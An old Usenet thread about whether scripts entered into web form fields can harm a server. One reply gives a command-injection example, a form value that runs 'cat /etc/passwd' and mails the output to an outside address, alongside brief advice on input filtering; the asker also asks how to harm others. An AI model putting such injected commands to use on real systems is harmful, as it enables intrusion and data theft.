hack script and forms

Re: hack script and forms


"steve" <NOSPAMstoianst oian@hotmail.co m> wrote in message
news:bqjil0$qqe $1@ctb-nnrp2.saix.net. ..[color=blue]
> Hi all
>
> what is it about that some one can paste script in the form field and
> submit the form and than what?
>
> can some one open my ice about that
> I like to know the bead and the good things about it
>
> Thanks
>
>[/color]

Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.

Re: hack script and forms

Brian said:[color=blue]
>
>
>"steve" <NOSPAMstoianst oian@hotmail.co m> wrote in message
>news:bqjil0$qq e$1@ctb-nnrp2.saix.net. ..[color=green]
>> Hi all
>>
>> what is it about that some one can paste script in the form field and
>> submit the form and than what?
>>
>> can some one open my ice about that
>> I like to know the bead and the good things about it
>>
>> Thanks
>>
>>[/color]
>
>Hmmmm... I am guessing that this is a poor translation, because I have no
>idea what you are asking... sorry.[/color]

I think he was trying to be clever.
open my ice = "open my eyes".

Re: hack script and forms


"Lee" <REM0VElbspamtr ap@cox.net> wrote in message
news:bql21u01hm g@drn.newsguy.c om...[color=blue]
> Brian said:[color=green]
> >
> >
> >"steve" <NOSPAMstoianst oian@hotmail.co m> wrote in message
> >news:bqjil0$qq e$1@ctb-nnrp2.saix.net. ..[color=darkred]
> >> Hi all
> >>
> >> what is it about that some one can paste script in the form field and
> >> submit the form and than what?
> >>
> >> can some one open my ice about that
> >> I like to know the bead and the good things about it
> >>
> >> Thanks
> >>
> >>[/color]
> >
> >Hmmmm... I am guessing that this is a poor translation, because I have no
> >idea what you are asking... sorry.[/color]
>
> I think he was trying to be clever.
> open my ice = "open my eyes".
>[/color]

Yeah, I read it that way... I still dont know what he is asking, and it is
likely the case for the other readers of this group.

Brian

Re: hack script and forms

Brian said:[color=blue]
>
>
>"Lee" <REM0VElbspamtr ap@cox.net> wrote in message
>news:bql21u01h mg@drn.newsguy. com...[color=green]
>> Brian said:[color=darkred]
>> >
>> >
>> >"steve" <NOSPAMstoianst oian@hotmail.co m> wrote in message
>> >news:bqjil0$qq e$1@ctb-nnrp2.saix.net. ..
>> >> Hi all
>> >>
>> >> what is it about that some one can paste script in the form field and
>> >> submit the form and than what?
>> >>
>> >> can some one open my ice about that
>> >> I like to know the bead and the good things about it
>> >>
>> >> Thanks
>> >>
>> >>
>> >
>> >Hmmmm... I am guessing that this is a poor translation, because I have no
>> >idea what you are asking... sorry.[/color]
>>
>> I think he was trying to be clever.
>> open my ice = "open my eyes".
>>[/color]
>
>Yeah, I read it that way... I still dont know what he is asking, and it is
>likely the case for the other readers of this group.[/color]

Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

Re: hack script and forms


"Brian" <BrianGenisio@n ospam.yahoo.com > wrote in message
news:3fce1be9$1 @10.10.0.241...[color=blue]
>
> "Lee" <REM0VElbspamtr ap@cox.net> wrote in message
> news:bql21u01hm g@drn.newsguy.c om...[color=green]
> > Brian said:[color=darkred]
> > >
> > >
> > >"steve" <NOSPAMstoianst oian@hotmail.co m> wrote in message
> > >news:bqjil0$qq e$1@ctb-nnrp2.saix.net. ..
> > >> Hi all
> > >>
> > >> what is it about that some one can paste script in the form field[/color][/color][/color]
and[color=blue][color=green][color=darkred]
> > >> submit the form and than what?
> > >>
> > >> can some one open my ice about that
> > >> I like to know the bead and the good things about it
> > >>
> > >> Thanks
> > >>
> > >>
> > >
> > >Hmmmm... I am guessing that this is a poor translation, because I have[/color][/color][/color]
no[color=blue][color=green][color=darkred]
> > >idea what you are asking... sorry.[/color]
> >
> > I think he was trying to be clever.
> > open my ice = "open my eyes".
> >[/color]
>
> Yeah, I read it that way... I still dont know what he is asking, and it is
> likely the case for the other readers of this group.
>
> Brian
>
>[/color]

....in other words, what's this I hear about people putting script (i.e.,
"var x = 0 / 0;") into the textbox of a form and submitting the form. What
happens thereafter, someone explain it to me, and what are the good and...
bead things about it.

And the answer is:

In order to open the Closed Eye of the Ice Demon, you'll need a Bottled Fire
Elemental (get that in the linux/apache ng). Once the Eye is open, you take
your Beads of the Deliquent Monk that you get in this ng and wrap them
around the Ancient Staff of Warding (I have no idea where you get an ASoW
these days, check google). Once the Beads are on the Staff, a localised
blaze will ignite on the staff, about 3/4 of the way up. Let it burn itself
out. A charred, round depression (socket) will be left. Put the Open eye
into the charred socket. This creates the Visionary Staff of Deliquency.
Come back and see me after you've obtained the staff and I'll show you how
to smite a form with it.

Re: hack script and forms


"Lee" <REM0VElbspamtr ap@cox.net> wrote in message
news:bqlau102dd v@drn.newsguy.c om...[color=blue]
> Brian said:[color=green]
> >
> >
> >"Lee" <REM0VElbspamtr ap@cox.net> wrote in message
> >news:bql21u01h mg@drn.newsguy. com...[color=darkred]
> >> Brian said:
> >> >
> >> >
> >> >"steve" <NOSPAMstoianst oian@hotmail.co m> wrote in message
> >> >news:bqjil0$qq e$1@ctb-nnrp2.saix.net. ..
> >> >> Hi all
> >> >>
> >> >> what is it about that some one can paste script in the form field[/color][/color][/color]
and[color=blue][color=green][color=darkred]
> >> >> submit the form and than what?
> >> >>
> >> >> can some one open my ice about that
> >> >> I like to know the bead and the good things about it
> >> >>
> >> >> Thanks
> >> >>
> >> >>
> >> >
> >> >Hmmmm... I am guessing that this is a poor translation, because I have[/color][/color][/color]
no[color=blue][color=green][color=darkred]
> >> >idea what you are asking... sorry.
> >>
> >> I think he was trying to be clever.
> >> open my ice = "open my eyes".
> >>[/color]
> >
> >Yeah, I read it that way... I still dont know what he is asking, and it[/color][/color]
is[color=blue][color=green]
> >likely the case for the other readers of this group.[/color]
>
> Oh. I understood the poorly-written question immediately, but my
> first impression had been that "open my ice" was a mistranslation,
> so I assumed that it was what was confusing you, too.
>
> He seems to be asking if it's true that a badly written server-side
> script can be coerced into executing code entered into form fields.
>
> Yes. He should read up on web server security.
>[/color]

Oh, in that case, the poster should stop being cute, and get to the point.
Basically, the answer is yes... it is very easy to screw with a badly
written server-side script.

For instance, let's say your script does something like:

exec("SomeShell Function " + formValue + " someParamater") ;

and the user enters : something ; cat /etc/passwd | sendmail
yahoo@yahoo.com;

That is a very simple example of making a mess, and finding all of the users
on the server :)

A good way to _start_ to prevent it, is to do some server-side variable
checking, and stripping illegal characters, such as ";`'@$ etc.

B

Re: hack script and forms

> >> >> Hi all[color=blue][color=green][color=darkred]
> >> >>
> >> >> what is it about that some one can paste script in the form[/color][/color][/color]
field and[color=blue][color=green][color=darkred]
> >> >> submit the form and than what?
> >> >>
> >> >> can some one open my ice about that
> >> >> I like to know the bead and the good things about it
> >> >>
> >> >> Thanks
> >> >>
> >> >>
> >> >
> >> >Hmmmm... I am guessing that this is a poor translation, because[/color][/color][/color]
I have no[color=blue][color=green][color=darkred]
> >> >idea what you are asking... sorry.
> >>
> >> I think he was trying to be clever.
> >> open my ice = "open my eyes".
> >>[/color]
> >
> >Yeah, I read it that way... I still dont know what he is asking,[/color][/color]
and it is[color=blue][color=green]
> >likely the case for the other readers of this group.[/color]
>
> Oh. I understood the poorly-written question immediately, but my
> first impression had been that "open my ice" was a mistranslation,
> so I assumed that it was what was confusing you, too.
>
> He seems to be asking if it's true that a badly written server-side
> script can be coerced into executing code entered into form fields.
>
> Yes. He should read up on web server security.[/color]

Sorry about my English
I did not try to be clever, I just wont to know as Lee gas how does
that work and does it effect the server or the user computer.

For example I have a web page .html with a form in site using form to
mail function.
What script can some body use to harm me or the server.
How can I protect myself from such scripts
and on the other hand
How can I use such script to harm somebody's computer or a server.

Thanks and I hope that you guys understand my English

Re: hack script and forms

steve said:
[color=blue]
>Sorry about my English[/color]

Sorry about guessing incorrectly.
[color=blue]
>I did not try to be clever, I just wont to know as Lee [guess] how does
>that work and does it effect the server or the user computer.[/color]

The server.
[color=blue]
>For example I have a web page .html with a form in site using form to
>mail function.
>What script can some body use to harm me or the server.
>How can I protect myself from such scripts[/color]

If you're using a form to mail function provided by your ISP or some
other site, then you (and they) should be safe. People don't usually
have much need to write their own, so I'm assuming that's the case.